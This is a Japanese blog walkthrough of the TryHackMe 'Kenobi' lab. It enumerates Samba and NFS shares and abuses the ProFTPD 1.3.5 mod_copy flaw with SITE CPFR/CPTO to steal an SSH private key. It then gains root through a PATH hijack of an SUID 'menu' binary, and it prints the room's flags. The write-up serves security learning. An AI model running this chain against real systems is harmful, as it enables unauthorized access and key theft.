【CVE-2015-3306】共有の Samba を列挙、proftpd の脆弱なバージョンを操作、パス変数操作で権限昇格してみた!TryHackMe Kenobi Writeup

【CVE-2015-3306】共有の Samba を列挙、proftpd の脆弱なバージョンを操作、パス変数操作で権限昇格してみた!TryHackMe Kenobi Writeup
  • URLをコピーしました!

今回は、共有の Samba を列挙、proftpd の脆弱なバージョンを操作、パス変数操作で権限昇格していきます。
「TryHackMe-Kenobi:https://tryhackme.com/room/kenobi

解説は、ネタバレになりますので、注意してください。

目次

事前準備

まずは、「Start Machine」を選択して、ターゲットマシンを起動しておきます。

下記のように、IP Addressが表示されていれば、OKです。

Deploy the vulnerable machine(脆弱なマシンを展開する)

先ほどマシンを展開したので、nmapを使ってスキャニングを行っていきます。

Make sure you’re connected to our network and deploy the machine(ネットワークに接続していることを確認してマシンを展開してください)

先ほどマシンは展開しましたので、ここは、回答しておきましょう。

Answer

Scan the machine with nmap, how many ports are open?(nmap でマシンをスキャンします。開いているポートはいくつありますか?)

ポートがいくつ開いているかときかれていますので、nmapを使ってポートスキャンしていきます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~]
└─$ nmap -Pn -T4 -A 10.10.26.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 22:59 JST
Nmap scan report for 10.10.26.135
Host is up (0.25s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      34211/tcp   mountd
|   100005  1,2,3      39978/udp   mountd
|   100005  1,2,3      46105/tcp6  mountd
|   100005  1,2,3      57683/udp6  mountd
|   100021  1,3,4      32905/tcp   nlockmgr
|   100021  1,3,4      44853/tcp6  nlockmgr
|   100021  1,3,4      46652/udp   nlockmgr
|   100021  1,3,4      49249/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  `�{�}      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs         2-4 (RPC #100003)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-08-27T14:00:16
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-08-27T09:00:16-05:00
|_clock-skew: mean: 1h39m58s, deviation: 2h53m13s, median: -1s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.93 seconds

量が多いので、少しまとめておくと、下記の7個のポートが開いていることがわかります。

21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  `�{�}      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs         2-4 (RPC #100003)

Answer

Enumerating Samba for shares

開いているポートのうち、httpはすぐ確認できるのでサクッと確認してみると、/admin.htmlにトラップだという画像がありました。
次に気になるポートが、Sambaの139と445ですね。

Using the nmap command above, how many shares have been found?(上記の nmap コマンドを使用すると、いくつの共有が見つかりましたか?)

共有がいくつあるか確認してみます。nmapには色々ネットワークタスクを自動化するツールがあり、その中に共有を列挙するスクリプトがあるので、利用していきましょう。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.26.135 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 23:08 JST
Nmap scan report for 10.10.26.135
Host is up (0.25s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.26.135\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.26.135\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.26.135\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 38.42 seconds

これをまとめると、下記の3つが共有されていることがわかります。

\\10.10.26.135\IPC$
\\10.10.26.135\anonymous
\\10.10.26.135\print$

この中で気になるのは、anonymousです。これは、次調査していきます。

Answer

Once you’re connected, list the files on the share. What is the file can you see?(接続したら、共有上のファイルを一覧表示します。見えるファイルは何ですか?)

では、anonymousに接続してみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~]
└─$ smbclient //10.10.26.135/anonymous                                       
Password for [WORKGROUP\hack_lab]:
Try "help" to get a list of possible commands.
smb: \> 

接続したら、共有のファイル一覧を表示してみましょう。

smb: \> ls
  .                                   D        0  Wed Sep  4 19:49:09 2019
  ..                                  D        0  Wed Sep  4 19:56:07 2019
  log.txt                             N    12237  Wed Sep  4 19:49:09 2019

                9204224 blocks of size 1024. 6877104 blocks available
smb: \> dir
  .                                   D        0  Wed Sep  4 19:49:09 2019
  ..                                  D        0  Wed Sep  4 19:56:07 2019
  log.txt                             N    12237  Wed Sep  4 19:49:09 2019

                9204224 blocks of size 1024. 6877104 blocks available

「log.txt」というファイルが存在していることが確認できます。

Answer

What port is FTP running on?(FTP はどのポートで実行されていますか?)

これは、nmapですでに確認できているのですが、念のためlog.txtを確認してみます。
まずは、log.txtをダウンロードしましょう。

smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (12.0 KiloBytes/sec) (average 12.0 KiloBytes/sec)
smb: \> 

log.txtの内容は、下記になっています。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ cat log.txt                                                              
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|           ..    |
|        . o. .   |
|       ..=o +.   |
|      . So.o++o. |
|  o ...+oo.Bo*o  |
| o o ..o.o+.@oo  |
|  . . . E .O+= . |
|     . .   oBo.  |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            kenobi
Group                           kenobi

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite          on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User                          ftp
  Group                         ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias                     anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients                    10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  DisplayLogin                  welcome.msg
  DisplayChdir                  .message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# server string is the equivalent of the NT Description field
        server string = %h server (Samba, Ubuntu)

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
;   comment = Home Directories
;   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
;   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
;   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
;   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
;   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin
[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes

この内容からわかる情報としては、下記があげられると思います。

  • sshの秘密鍵が、「/home/kenobi/.ssh/id_rsa」に保存されていること
  • ProFTPDサーバーに関する情報

Answer

What mount can we see? (どのようなマウントが見えるでしょうか?)

次は、nfsはrpcベースのファイル共有サービスになっています。
nfs自体は2049で稼働しているものの、rpcがnfsへの入り口となっています。

2049/tcp open  nfs         2-4 (RPC #100003)

すなわち、111のrpcをスキャンしてみます。

111/tcp  open  rpcbind     2-4 (RPC #100000)


nsfが実行されていることが確認できたら、まず特定するべきは、リモートからエクスポート可能なディレクトリを確認することです。
ここでも、Nmap Scription Engineを使っていきます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ ls /usr/share/nmap/scripts | grep nfs
nfs-ls.nse
nfs-showmount.nse
nfs-statfs.nse

ポート番号「111」に対して、実行してみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.26.135        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 23:41 JST
Nmap scan report for 10.10.26.135
Host is up (0.25s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 4.27 seconds

「/var」がエクスポートされていることが確認できました。

とりあえず、「/var」を先にマウントしてみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ mkdir kenobiNFS 

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ sudo mount 10.10.6.106:/var ~/TryHackMe/kenobiNFS                        
[sudo] password for hack_lab: 

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ ll kenobiNFS/                                                            
total 48
drwxr-xr-x  2 root root     4096 Sep  4  2019 backups
drwxr-xr-x  9 root root     4096 Sep  4  2019 cache
drwxrwxrwt  2 root root     4096 Sep  4  2019 crash
drwxr-xr-x 40 root root     4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff    4096 Apr 13  2016 local
lrwxrwxrwx  1 root root        9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root ssl-cert 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail     4096 Feb 27  2019 mail
drwxr-xr-x  2 root root     4096 Feb 27  2019 opt
lrwxrwxrwx  1 root root        4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root     4096 Jan 30  2019 snap
drwxr-xr-x  5 root root     4096 Sep  4  2019 spool
drwxrwxrwt  6 root root     4096 Aug 28 22:29 tmp
drwxr-xr-x  3 root root     4096 Sep  4  2019 www

tmpあたりが利用できそうですね。

Answer

Gain initial access with ProFtpd

ProFtpdを利用して、ローカル権限を取得していきます。

What is the version?

まずは、netcatでFTPサービスに接続してみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ nc 10.10.6.106 21                                                        
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.6.106]

ProFTPDのバージョンが「1.3.5」であることがわかりました。

Answer

How many exploits are there for the ProFTPd running?

ProFTPd 1.3.5に脆弱性がないか、searchsploitで検索をかけてみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ searchsploit proftpd 1.3.5
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Executi | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command  | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command  | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                  | linux/remote/36742.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

一番下の「ProFTPd 1.3.5 – File Copy」によると、mod_copyを非認証クライアントでも利用できてしまうというものがありました。

Answer

What is Kenobi’s user flag (/home/kenobi/user.txt)?

mod_copyモジュールは、サーバー上のある場所から別の場所にファイル/ディレクトリをコピーするために使用できるSITE CPFRおよび、SITE CPTOコマンドがあります。

kenobiの秘密鍵が生成されていることがわかってますので、これを取得したいと思います。

Enter file in which to save the key (/home/kenobi/.ssh/id_rsa)

どこにコピーするかというと、/varがマウント可能であることもすでにわかっていますので、kenobiの秘密鍵を/varにコピーしてみます。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ nc 10.10.6.106 21                                                        
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.6.106]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/id_rsa
550 CPTO: Permission denied

「/var」には権限がなかったですね。。。
先ほどマウントした結果から「/var/tmp」なら問題なさそうです。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ nc 10.10.6.106 21                      
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.6.106]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

コピーできました!

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ cd kenobiNFS/tmp                                                                   

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe/kenobiNFS/tmp]
└─$ ll                                                                       
total 20
-rw-r--r-- 1 hack_lab hack_lab 1675 Aug 28 23:09 id_rsa
drwx------ 3 root     root     4096 Sep  4  2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root     root     4096 Aug 28 22:29 systemd-private-67f758faf97d41669a18be5ca17b7ff2-systemd-timesyncd.service-bUa0Yi
drwx------ 3 root     root     4096 Sep  4  2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root     root     4096 Sep  4  2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

一旦、ローカルにコピーしておきます。このとき、権限を変更しておきましょう。

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ cp kenobiNFS/tmp/id_rsa ./

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/TryHackMe]
└─$ sudo chmod 600 id_rsa 

kenobiの秘密鍵を利用して、ssh接続してみます。

┌──(root㉿kali)-[~]
└─# ssh -i id_rsa kenobi@10.10.154.255
The authenticity of host '10.10.154.255 (10.10.154.255)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.154.255' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$

無事、接続できました。
このまま、user.txtを確認して、フラグを取得してしまいましょう!

kenobi@kenobi:~$ ll
total 40
drwxr-xr-x 5 kenobi kenobi 4096 Sep  4  2019 ./
drwxr-xr-x 3 root   root   4096 Sep  4  2019 ../
lrwxrwxrwx 1 root   root      9 Sep  4  2019 .bash_history -> /dev/null
-rw-r--r-- 1 kenobi kenobi  220 Sep  4  2019 .bash_logout
-rw-r--r-- 1 kenobi kenobi 3771 Sep  4  2019 .bashrc
drwx------ 2 kenobi kenobi 4096 Sep  4  2019 .cache/
-rw-r--r-- 1 kenobi kenobi  655 Sep  4  2019 .profile
drwxr-xr-x 2 kenobi kenobi 4096 Sep  4  2019 share/
drwx------ 2 kenobi kenobi 4096 Sep  4  2019 .ssh/
-rw-rw-r-- 1 kenobi kenobi   33 Sep  4  2019 user.txt
-rw------- 1 kenobi kenobi  642 Sep  4  2019 .viminfo

kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

Answer

Privilege Escalation with Path Variable Manipulation

次は、特権昇格です。よくあるSUIDで特権昇格を狙います。

SUIDは、ファイル所有者の権限でファイルを実行しますので、rootがファイル所有者の場合、root権限を取得することが可能になります。

What file looks particularly out of the ordinary?

SUIDをもつファイルを確認してみます。

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

この中で怪しいのは、「/usr/bin/menu」ですかね。見たことないファイルです。

Answer

Run the binary, how many options appear?

menuを実行してみます。
サーバーのステータスや、kernel version、ifconfigの内容を確認できるようです。

kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2023 23:58:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

Answer

What is the root flag (/root/root.txt)?

stringsを利用して、menuのバイナリ上で判読できる文字列を検索してみます。

kenobi@kenobi:~$ strings /usr/bin/menu
...
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
...

下記に注目してください。
「curl」がフルパスではないことが確認できます。(/usr/bin/curlや、/usr/bin/unameになっていない)

curl -I localhost

ということは、/bin/shをcurlという名前でコピーし、アクセス権限を与えて、PATHに追加することで、
/usr/bin/menuが実行されるときに、PATHを使用して、コピーした方のcurlが見つかることになります。

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# cat /root/root.txt
177b3cd8562289f37382721c28381f02

特権昇格ができました!

Answer

まとめ

今回は、共有の Samba を列挙、proftpd の脆弱なバージョンを操作、パス変数操作で権限昇格してみました。
全然関係ないですが、openvpnのsshで躓いてしまいましたが、なんとかできました。

参考文献・サイト

よかったらシェアしてね!
  • URLをコピーしました!

この記事を書いた人

情報セキュリティを勉強するために始めたブログです。
新人のため、広い心を持って見ていただけると嬉しく思います。
楽しくプログラミングを勉強するために、「Teech Lab.」もありますので、ソフトウェア開発にも興味があればぜひ覗いて見てください!

目次